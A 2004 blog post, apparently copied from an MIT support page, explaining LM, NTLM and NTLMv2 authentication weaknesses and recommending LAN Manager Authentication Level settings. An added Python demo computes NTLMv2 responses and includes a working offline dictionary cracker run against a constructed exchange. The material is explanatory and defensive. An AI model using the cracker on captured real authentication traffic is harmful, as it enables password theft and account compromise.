Wednesday, September 01, 2004

LM NTLM NTLMv2

When accessing resources on a Microsoft Windows 2000 or XP-based machine, the client provides credentials in the form of either Kerberos v5 tickets or a challenge/response authentication mechanism. The Kerberos tickets are used between Windows 2000 (and newer) machines within trusted domains. Stand-alone (non-domain) Windows 2000 machines, those in untrusted domains, and "downlevel" clients (Windows 95/98/NT and Unix-like OSes), however, must use challenge/response. Microsoft supports three types of challenge/response:
LAN Manager (LM)
NT LAN Manager (NTLM) version 1
NT LAN Manager (NTLM) version 2
LM is an old protocol and *very* easily attacked. NTLM is a significant improvement over LM, but is still relatively susceptible to attack. NTLM v2 adds several enhancements to v1 that make it much more secure.

LM

In LM authentication the password is case-INsensitive: it is converted to upper case before hashing, so each character is effectively drawn from the 26 upper-case letters, the digits and the punctuation characters. Additionally, passwords are padded to 14 characters and divided into two 7-character halves that are hashed independently (each half is used as a DES key to encrypt a fixed constant), so a 14-character password is only as strong as two separate 7-character passwords, and a password of 7 characters or fewer yields a constant, instantly recognizable second half. The combination of a small character set and password division results in a very small overall key space. Dictionary attacks on LM hashes are very fast (case insensitive!) and even a complete brute force attack can be done in relatively little time.

NTLM

Recognizing this weakness, Microsoft introduced the NTLM protocol, which makes the password case sensitive (the NT hash is MD4 over the Unicode password) and removes the division into halves. Dictionary attacks on this protocol still work very well against weak passwords, but Microsoft claims that 100 2GHz machines would still take 5.5 years to obtain a password by brute force. Fortunately for attackers (unfortunately for you), the NTLM response is a deterministic function of the NT hash and the server's 8-byte challenge, and the exchange itself is neither signed nor encrypted. An attacker who can act as the server therefore gets to choose the challenge (a "chosen plaintext" attack), which allows responses to a fixed challenge to be precomputed, and an attacker on the path can inject or alter messages in the exchange.

NTLM v2

To further improve the challenge/response mechanism, Microsoft introduced NTLM v2. The response is now computed with HMAC-MD5 keyed by a 128-bit hash derived from the password, user name and domain, which increases the difficulty of exhaustive brute force attacks (according to Microsoft). The hashed input includes a nonce chosen by the client as well as the server's challenge, so a server-chosen challenge no longer determines the response, which defeats the precomputation (chosen-plaintext) attack described above. The protocol also enables session security (signing and/or encryption) between the client and the server, using session keys derived for that purpose, which protects the subsequent traffic against message injection and tampering. Note that signing and sealing protect the traffic after authentication, not the authentication exchange itself: a captured NTLMv2 response can still be attacked offline with a dictionary, so the improvement over LM and NTLM lies in resistance to precomputation and tampering, and the strength of the password still matters.
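As an added illustration of the NTLM and NTLM v2 sections above (example code written for this page, not Microsoft's implementation and not code from the MIT page), the following Python computes the NT hash and an NTLMv2 response in the form specified by MS-NLMP and then runs an offline dictionary attack against a constructed exchange. The user name, domain, challenges, target info and password are made-up sample values, and the LM and NTLMv1 DES computations are left out. It shows two things the text describes: the client's own nonce inside the response means a server-chosen challenge alone does not fix the hashed input, and a captured NTLMv2 response is still crackable offline when the password is weak.

```python
"""NT hash, NTLMv2 response and an offline dictionary attack on a captured
NTLMv2 exchange. Standard library only; MD4 is implemented inline because
hashlib does not always expose it. All sample data below is constructed."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 over the UTF-16LE password."""
    def rot(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(48):
            if i < 16:
                fn, k, s, const = f, i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:
                fn, k, s, const = g, (i % 4) * 4 + (i - 16) // 4, (3, 5, 9, 13)[i % 4], 0x5A827999
            else:
                order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
                fn, k, s, const = h, order[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a = rot((a + fn(b, c, d) + x[k] + const) & MASK, s)
            a, b, c, d = d, a, b, c          # rotate the working registers
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    # MS-NLMP NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain.
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def ntlmv2_blob(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    # Client-built blob: version, 64-bit FILETIME, 8-byte client nonce, reserved,
    # the server's AV_PAIR target info, trailer. Sent in the clear with the response.
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    # NTProofStr = HMAC-MD5(NTOWFv2, server_challenge || blob). Because the blob
    # carries the client's nonce, the server cannot choose the whole hashed input.
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def crack_ntlmv2(user, domain, server_challenge, blob, proof, wordlist):
    """Offline dictionary attack: every input except the password is on the wire."""
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, server_challenge, blob), proof):
            return candidate
    return None


# --- constructed sample exchange (not captured from a real network) ---
USER, DOMAIN = "alice", "CORP"
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")   # 8-byte nonce from the CHALLENGE message
CLIENT_CHALLENGE = bytes.fromhex("a1a2a3a4a5a6a7a8")   # 8-byte nonce chosen by the client
TIMESTAMP = 0x01C4900000000000                          # arbitrary FILETIME value
# AV_PAIR: MsvAvNbDomainName (id 2, 8 bytes of UTF-16LE) followed by MsvAvEOL
TARGET_INFO = b"\x02\x00\x08\x00" + "CORP".encode("utf-16le") + b"\x00\x00\x00\x00"
SAMPLE_PASSWORD = "Summer2004!"                        # deliberately weak, for the demo


def captured_exchange():
    """What an attacker sniffing the session would hold: blob and NTProofStr."""
    blob = ntlmv2_blob(TIMESTAMP, CLIENT_CHALLENGE, TARGET_INFO)
    return blob, ntlmv2_proof(SAMPLE_PASSWORD, USER, DOMAIN, SERVER_CHALLENGE, blob)


def demo():
    blob, proof = captured_exchange()
    # Same server challenge, different client nonce -> different response, so a
    # rogue server that always sends one fixed challenge gains nothing from tables.
    other_blob = ntlmv2_blob(TIMESTAMP, b"\x00" * 8, TARGET_INFO)
    assert ntlmv2_proof(SAMPLE_PASSWORD, USER, DOMAIN, SERVER_CHALLENGE, other_blob) != proof
    # ...but the captured response still falls to a small wordlist.
    return crack_ntlmv2(USER, DOMAIN, SERVER_CHALLENGE, blob, proof,
                        ["password", "letmein", "Summer2004", SAMPLE_PASSWORD])


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("recovered password:", demo())
```

The NT hash of "password" computed by this block is the well-known 8846f7eaee8fb117ad06bdd830b7586c, which makes a convenient sanity check for the MD4 implementation before trusting the rest. The `crack_ntlmv2` loop is exactly the work a password cracker performs per candidate against a captured NTLMv2 exchange, which is why the level settings below only raise the bar for an attacker; they do not remove the need for strong passwords.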

The configuration of this authentication manifests itself in the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\LMCompatibilityLevel registry value (a REG_DWORD), which can take the following values:
0 - Send LM & NTLM responses
1 - Send LM & NTLM - use NTLMv2 session security if negotiated
2 - Send NTLM response only
3 - Send NTLMv2 response only
4 - Send NTLMv2 response only\refuse LM
5 - Send NTLMv2 response only\refuse LM & NTLM
While settings 0-2 are self-explanatory, the distinction between the last three is less clear. In all of them (3-5) the machine uses only NTLMv2 for its outgoing authentication. With a value of 3, however, the machine (acting as a server or domain controller) still accepts all forms of incoming authentication; with a value of 4 it refuses LM, and with a value of 5 it refuses both LM and NTLM.
Conveniently, this setting can also be configured through the group policy or local security MMC snap-ins under "Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\LAN Manager Authentication Level" in Windows 2000 and "Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Network Security: LAN Manager Authentication Level" in Windows XP.

Recommendations
Windows 2000 and XP
LM should never, ever, ever be allowed as authentication to or from a member server. NTLM v2 should be required whenever possible (that is, whenever it doesn't break required functionality - see Special Cases below). To require NTLMv2 for authentication from the member server and at least NTLMv1 for authentication to the member server:
Set the LAN Manager Authentication Level security option to "4 - Send NTLMv2 response only\refuse LM"
Special Cases
Mixed Environments
NTLMv2 can be used by Windows NT 4 machines only with Service Pack 4 or higher installed. Similarly, it can only be used by Windows 95/98/Me machines that have the Directory Services Client installed (available on the Windows 2000 CD-ROM). With NTLMv2 required and LM/NTLM refused (level 5), the server will not be able to authenticate downlevel clients that don't meet the above criteria (Windows 2000 and XP machines work fine). With level 4, Windows NT 4 machines should be able to authenticate to the server successfully even without SP4 (although 95/98/Me clients still require the DS Client). If communication with 95/98/Me or other LM-only machines is absolutely required, the setting can be reduced to "3 - Send NTLMv2 response only". This compatibility does come at the expense of security, as detailed above.
AFS Client
The AFS client used in the WIN.MIT.EDU domain currently does not support NTLMv2. Therefore, restricting outgoing authentication to NTLMv2 will result in an inability to obtain AFS tokens from the server. In most cases there's no need to access AFS from the server, but if your environment is an exception and this is required, you must reduce the NTLM level to "2 - Send NTLM response only". Again, this comes at the expense of security.

http://mit.edu/pismere/support/for-cont-admins/security-info/ntlm.html
